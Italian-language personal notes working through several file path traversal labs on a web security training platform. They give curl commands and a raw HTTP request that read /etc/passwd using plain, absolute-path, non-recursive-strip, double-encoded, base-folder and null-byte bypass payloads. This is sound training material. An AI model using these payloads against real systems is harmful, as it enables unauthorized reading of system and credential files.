Lab: File path traversal, simple case
- Usa burp suite perché devi interpretare la richiesta
- Intercetti la richiesta che carica l’immagine OPPURE apri l’immagine
- Sostituisci il nome di file con
../../../etc/passwd
Va bene anche usare curl:
curl https://0a9b001f04ffae71821f01d800ff0017.web-security-academy.net/image?filename=../../../etc/passwdEcco la risposta:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
// Etc...
Ovviamente la risposta è finta, voglio dire che ha tutti questi servizi a cazzo di cane?
Lab: File path traversal, traversal sequences blocked with absolute path bypass
In questo caso l’applicazione blocca le “traversal sequences” ma tratta il filename come se fosse relativo ad una working directory
curl path/al/laboratorio/image?filename=/etc/passwd
Lab: File path traversal, traversal sequences stripped non-recursively
curl https://0a830097034b97fb8182c04c001e00ab.web-security-academy.net/image?filename=....//....//....//etc/passwdLab: NOME LABORATORIO
- đź”— Link
- Fai l’url encode 2 volte della richiesta tramite il repeater di Burp Suite e manda
Questa è la richiesta:
GET /image?filename=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd HTTP/2
Host: 0a61005303a83b60803d9441004e00b7.web-security-academy.net
Cookie: session=36FEWpKcQ559kIKcMbY3d72PBuBy7gD7
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Sec-Ch-Ua-Platform: ""
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0a61005303a83b60803d9441004e00b7.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Per farlo da command line:
curl --verbose --get --data-urlencode "filename=../../../etc/passwd" https://0a61005303a83b60803d9441004e00b7.web-security-academy.net/imageDovresti trovare
> GET /image?filename=..%2f..%2f..%2fetc%2fpasswd HTTP/2Rimetti la stringa “..%2f..%2f..%2fetc%2fpasswd” nella richiesta in questo modo:
curl --verbose --get --data-urlencode "filename=...%2f..%2f..%2fetc%2fpasswd" https://0a61005303a83b60803d9441004e00b7.web-security-academy.net/imageNota
Potrebbe non funzionare questo secondo metodo perché i puntini non vengono encoded
Lab: File path traversal, validation of start of path
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences. For example:
The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.
curl https://0a2000e804ff1a4a80ef5886005b00a4.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwdLab: File path traversal, validation of file extension with null byte bypass
- In questo caso bisogna usare un “null byte” ovvero
%00perché il path deve finire con.jpg
curl https://0a17002103770425834bc5db006800e0.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg